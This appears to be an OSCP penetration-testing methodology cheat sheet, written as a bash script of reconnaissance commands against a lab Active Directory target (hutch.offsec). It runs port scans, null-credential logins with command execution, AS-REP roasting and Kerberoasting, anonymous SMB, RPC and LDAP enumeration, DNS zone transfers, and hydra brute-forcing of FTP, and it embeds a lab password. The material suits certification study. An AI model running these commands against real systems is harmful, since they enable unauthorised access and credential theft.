OSCP Methodology
Enumeration
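# Target address. The notes use both $ip and $IP, so the two are kept in step;
# the :? guard stops every command below from running against an empty host.
: "${ip:?set ip to the target address before running these notes}"
IP=$ip

# Account used by the Kerberos checks below. Defaults are the lab values from
# the original notes (hutch.offsec); export domain/user/pass instead of editing
# this file so the password does not have to live in the notes.
domain=${domain:-hutch.offsec}
user=${user:-fmcsorley}
pass=${pass:-CrabSharkJellyfish192}

# Port scans: output is appended under nmap/ (-p keeps a re-run from failing
# when the directory already exists).
mkdir -p nmap
sudo nmap -sS "$IP" -sV -sC -Pn -n --open | tee -a nmap/nmap-default-script.md
sudo nmap -sS "$IP" -p- -T5 --min-rate 2000 -Pn -n --open | tee -a nmap/nmap-full-ports.md
rustscan -a "$IP" | tee -a nmap/rustscan
sudo autorecon "$IP"
# UDP
sudo nmap -Pn -n "$IP" -sU --top-ports=100

# Service checks with an empty username and password (netexec).
netexec rdp "$ip" -u '' -p '' -x whoami
netexec wmi "$ip" -u '' -p '' -x whoami
netexec smb "$ip" -u '' -p '' -x whoami
netexec ldap "$ip" -u '' -p ''
netexec ftp "$ip" -u '' -p ''
netexec vnc "$ip" -u '' -p ''
netexec winrm "$ip" -u '' -p '' -x whoami
netexec ssh "$ip" -u '' -p '' -x whoami
netexec nfs "$ip" -u '' -p ''
netexec mssql "$ip" -u '' -p '' -x whoami
netexec smb "$ip" -u '' -p '' --shares

# AS-REP Roasting
impacket-GetNPUsers -dc-ip "$ip" -request "$domain/$user:$pass"
# Kerberoasting
impacket-GetUserSPNs -dc-ip "$ip" -request "$domain/$user:$pass"

# SMB 139,445
# SMB Shares (smbclient -L takes //host; the original had four slashes)
smbclient -L "//$ip" -U '' --password=''
smbmap -H "$ip"
# Enum4Linux
enum4linux-ng -R -d -A "$ip"
enum4linux -a "$ip"

# WEB
sudo gobuster dir -w '/usr/share/wordlists/common_big.txt' -u "http://$IP" -t 42 -b 404,403,400
# wordlist
# /usr/share/wordlists/common_big_directory-list-2.3-medium.txt
# - Subdomains ?

# DNS 53
# DNS Zone Transfer ($domain is the AD domain set at the top of the file)
dig axfr "$domain" @"$ip"
dig @"$IP" axfr "$domain"

# RPC
rpcclient -U "" -N "$ip" -c "srvinfo"
rpcclient -U "" -N "$ip" -c "enumdomusers"
rpcclient -U "" -N "$ip" -c "querydominfo"

# RDP 3389
# Occasionally we can see usernames
rdesktop "$ip"

# LDAP
ldapsearch -H "ldap://$IP" -x -s base namingcontexts
ldapsearch -H "ldap://$IP" -x -b "DC=hutch,DC=offsec"
ldapsearch -x -H "ldap://$ip" -D '' -w '' -b "DC=hutch,DC=offsec"
ldapsearch -H "ldap://$ip" -x -s base -b '' "(objectClass=*)" "*" +
nxc ldap "$ip" -u '' -p '' --query "(sAMAccountName=*)" ""

# FTP 21
# - Default Creds
# - upload/download files
wget -r "ftp://Anonymous:pass@$IP"
sudo hydra -L names.txt -P '/usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt' -s 21 "ftp://$IP"

# Flag
# Windows cmd syntax (dir /s/b), not bash: these lines belong in a shell on the
# Windows host, so they are kept here as a reminder only.
# dir /s/b local.txt
# dir /s/b proof.txt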